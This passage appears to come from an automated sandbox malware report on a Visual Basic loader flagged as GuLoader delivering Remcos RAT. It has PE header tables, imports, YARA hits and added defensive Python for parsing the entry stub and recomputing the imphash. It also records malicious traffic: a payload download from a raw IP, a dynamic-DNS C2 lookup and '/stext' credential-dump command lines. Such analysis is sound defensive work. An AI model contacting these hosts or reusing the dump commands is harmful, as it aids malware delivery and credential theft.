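    rel32 = struct.unpack_from("<i", code, 6)[0]
    # rel32 is relative to the end of the 5-byte call, which sits at va + 5.
    call_target_va = (va + 10 + rel32) & 0xFFFFFFFF
    return vb_header_va, call_target_va


def is_vb_header(blob: bytes) -> bool:
    """The structure whose address is pushed starts with the ASCII tag 'VB5!'
    (used by both VB5 and VB6). Read it at vb_header_va once the image is mapped."""
    return blob[:4] == b"VB5!"


def tail_is_data(code: bytes) -> bool:
    """Bytes after the call are data, not code. A run of NUL bytes disassembles
    as 'add byte ptr [eax], al' (opcode 00 00), which is what the preview shows."""
    tail = code[10:]
    return bool(tail) and all(b == 0 for b in tail)


if __name__ == "__main__":
    stub = parse_vb6_entry_stub(ENTRY_BYTES, ENTRY_VA)
    if stub is None:
        print("not a VB6 entry stub")
    else:
        print("VB header VA: 0x%08X, ThunRTMain thunk VA: 0x%08X" % stub)
```

On a real sample, read the 10 bytes at AddressOfEntryPoint, then map `vb_header_va` through the section table and confirm `is_vb_header` before trusting the match; a loader that merely imitates the push/call shape will fail the signature check.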

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2d994 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x31000 | 0xe1a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1f0 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2d044 | 0x2e000 | False | 0.457790208899 | data | 5.78348802097 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x2f000 | 0x1250 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x31000 | 0xe1a0 | 0xf000 | False | 0.640185546875 | data | 6.27760526833 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3e7e1 | 0x9bf | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | |
RT_ICON | 0x3d45f | 0x1382 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | |
RT_ICON | 0x3783e | 0x5c21 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0x37716 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x3742e | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x36dc6 | 0x668 | data | |
RT_ICON | 0x3685e | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x35fb6 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x3510e | 0xea8 | data | |
RT_ICON | 0x34ca6 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x33bfe | 0x10a8 | data | |
RT_ICON | 0x31656 | 0x25a8 | data | |
RT_GROUP_ICON | 0x315a8 | 0xae | data | |
RT_VERSION | 0x31300 | 0x2a8 | data | English | United States

Imports

DLL | Import
MSVBVM60.DLL | __vbaVarSub, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, __vbaPut3, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaI2I4, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaVarLateMemCallLd, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr
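A few checks a practitioner would run on the header fields above, as an added Python example that is not part of the report: decode TimeDateStamp to confirm the bracketed date in the General table, map Data Directory RVAs onto the Sections table to reproduce the "Is in Section" column (including the bound-import entry at 0x228, which lies in the PE headers and so belongs to no section), and recompute the Import Hash from the import list the way pefile's get_imphash() does. All constants are the report's values. Whether the recomputed hash reproduces 86e8943063c6c8ab68d4fd8da1862bd7 depends on the listing above being in import-table order, which the page does not state, so the script prints the comparison rather than assuming it. Note also that the table contains only the VB6 runtime: `DllFunctionCall` is MSVBVM60's resolver for functions declared with `Declare`, so any Win32 API the loader reaches that way is invisible here, and the imphash fingerprints this set of runtime helpers, not the payload's API use.

```python
import hashlib
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

# Values copied from the report's Static PE Info tables.
TIME_DATE_STAMP = 0x599A3698
REPORT_IMPHASH = "86e8943063c6c8ab68d4fd8da1862bd7"
SECTIONS: List[Tuple[str, int, int]] = [  # (name, VirtualAddress, VirtualSize)
    (".text", 0x1000, 0x2D044),
    (".data", 0x2F000, 0x1250),
    (".rsrc", 0x31000, 0xE1A0),
]
IMPORTS: Dict[str, List[str]] = {
    "MSVBVM60.DLL": (
        "__vbaVarSub, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaFreeVar, "
        "__vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, __vbaPut3, _adj_fdiv_m64, "
        "_adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, "
        "_adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, "
        "_adj_fdivr_m16i, __vbaFpR4, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, "
        "EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaI2I4, __vbaObjVar, "
        "DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, "
        "EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, "
        "__vbaFPException, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, "
        "_adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, "
        "__vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaVarLateMemCallLd, "
        "__vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr"
    ).split(", "),
}


def pe_timestamp(stamp: int) -> str:
    """Decode IMAGE_FILE_HEADER.TimeDateStamp (seconds since the Unix epoch, UTC)
    in the same layout the report prints in brackets."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")


def section_for_rva(rva: int, sections: List[Tuple[str, int, int]] = SECTIONS) -> Optional[str]:
    """Name of the section whose virtual range contains rva, or None when the RVA
    falls in the PE headers (below the first section), as 0x228 does here."""
    for name, va, vsize in sections:
        if va <= rva < va + vsize:
            return name
    return None


def imphash(imports: Dict[str, List[str]]) -> str:
    """Import hash as pefile.get_imphash() computes it: DLL name lower-cased with a
    .dll/.ocx/.sys suffix removed, each 'lib.func' pair lower-cased, all pairs joined
    with commas in import-table order, MD5 of the result. Named imports only;
    ordinal-only imports first need a name from pefile's ordlookup table."""
    parts: List[str] = []
    for dll, funcs in imports.items():
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in ("dll", "ocx", "sys"):
            lib = base
        parts.extend(f"{lib}.{f.lower()}" for f in funcs)
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def resolves_apis_at_runtime(imports: Dict[str, List[str]]) -> bool:
    """True when MSVBVM60!DllFunctionCall is imported: the runtime resolver behind
    VB 'Declare' statements, i.e. Win32 APIs bound at run time, outside this table."""
    return any(f.lower() == "dllfunctioncall" for funcs in imports.values() for f in funcs)


if __name__ == "__main__":
    print("TimeDateStamp:", pe_timestamp(TIME_DATE_STAMP))
    for name, rva in [("IMPORT", 0x2D994), ("RESOURCE", 0x31000), ("BOUND_IMPORT", 0x228), ("IAT", 0x1000)]:
        print(f"{name:13s} 0x{rva:x} -> {section_for_rva(rva)}")
    h = imphash(IMPORTS)
    print("imphash:", h, "(matches report)" if h == REPORT_IMPHASH else "(differs: list order or ordinals)")
    print("runtime API resolution via DllFunctionCall:", resolves_apis_at_runtime(IMPORTS))
```

The hash is order- and case-sensitive by construction: two VB6 binaries that import the same runtime helpers in a different thunk order get different imphashes, so treat it as a packer-family hint, not an identity for the payload.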

Version Infos

Description | Data
Translation | 0x0409 0x04b0
LegalCopyright | Cfar
InternalName | Indregnet8
FileVersion | 1.00
CompanyName | Cfar
LegalTrademarks | Cfar
ProductName | Cfar
ProductVersion | 1.00
FileDescription | Cfar
OriginalFilename | Indregnet8.exe

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/02/22-02:28:02.373487 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49835 | 80 | 192.168.2.6 | 147.189.137.168

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2022 02:28:02.274339914 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.372740030 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.372864962 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.373486996 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.499038935 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.499066114 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.499083042 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.499106884 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.499120951 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.499125004 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.499165058 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.499185085 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.597301960 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.597328901 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.597342968 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.597382069 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.597408056 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.599652052 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.599713087 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.599730968 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.599747896 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.599747896 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.599770069 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.599783897 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.599791050 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.599808931 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.599812031 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.599822998 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.599836111 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.599864960 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.695604086 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.695719957 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.695727110 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.695780993 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.695806980 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.695847034 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.695907116 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.695914030 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.695964098 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.696228981 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698076963 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698133945 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698183060 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698201895 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698206902 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698254108 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698259115 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698302984 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698304892 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698353052 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698358059 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698401928 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698402882 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698451996 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698455095 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698529005 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698542118 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698596954 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698612928 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698627949 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698662996 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698684931 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698735952 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698774099 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.698781967 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.698820114 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.794315100 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794414997 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794423103 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.794466972 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.794467926 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794511080 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.794517994 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794567108 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.794575930 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794616938 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.794626951 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794668913 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.794668913 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794718027 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794758081 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.794766903 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794805050 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.794807911 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.797458887 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.797512054 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.797539949 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.797563076 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.797569990 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.797629118 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.797631025 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.797676086 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.797682047 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.797732115 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.797734022 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.797780037 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.797782898 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.797831059 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168
Jan 2, 2022 02:28:02.797856092 CET | 80 | 49835 | 147.189.137.168 | 192.168.2.6
Jan 2, 2022 02:28:02.797904015 CET | 49835 | 80 | 192.168.2.6 | 147.189.137.168

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2022 02:28:03.336359978 CET | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Jan 2, 2022 02:28:03.559317112 CET | 53 | 56628 | 8.8.8.8 | 192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 2, 2022 02:28:03.336359978 CET | 192.168.2.6 | 8.8.8.8 | 0xd3ae | Standard query (0) | nhtaxfilling.ddnsgeek.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 2, 2022 02:28:03.559317112 CET | 8.8.8.8 | 192.168.2.6 | 0xd3ae | No error (0) | nhtaxfilling.ddnsgeek.com | | 207.32.218.236 | A (IP address) | IN (0x0001)

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • 147.189.137.168

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    0192.168.2.649835147.189.137.16880C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Jan 2, 2022 02:28:02.373486996 CET8008OUTGET /1040_RyQoPlW98.bin HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: 147.189.137.168
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Jan 2, 2022 02:28:02.499038935 CET8009INHTTP/1.1 200 OK
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Last-Modified: Sat, 01 Jan 2022 18:55:36 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    ETag: "ff14be2941ffd71:0"
                                                                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                                                                    Date: Sun, 02 Jan 2022 01:27:24 GMT
                                                                                                                                                                    Content-Length: 474176


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 02:26:17
Start date: 02/01/2022
Path: C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\g4FtSOZMD9.exe"
Imagebase: 0x400000
File size: 258048 bytes
MD5 hash: 81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 02:27:06
Start date: 02/01/2022
Path: C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\g4FtSOZMD9.exe"
Imagebase: 0x400000
File size: 258048 bytes
MD5 hash: 81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, Author: Joe Security
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.462063926.00000000017A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 02:28:02
Start date: 02/01/2022
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\SysWOW64\svchost.exe
Imagebase: 0xe20000
File size: 44520 bytes
MD5 hash: FA6C268A5B5BDA067A901764D203D433
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 02:28:15
Start date: 02/01/2022
Path: C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
Imagebase: 0x400000
File size: 258048 bytes
MD5 hash: 81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 02:28:16
Start date: 02/01/2022
Path: C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
Imagebase: 0x400000
File size: 258048 bytes
MD5 hash: 81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 02:28:16
Start date: 02/01/2022
Path: C:\Users\user\Desktop\g4FtSOZMD9.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
Imagebase: 0x400000
File size: 258048 bytes
MD5 hash: 81F377EDA4163DA1B74CAE83E38CED9F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Disassembly

Code Analysis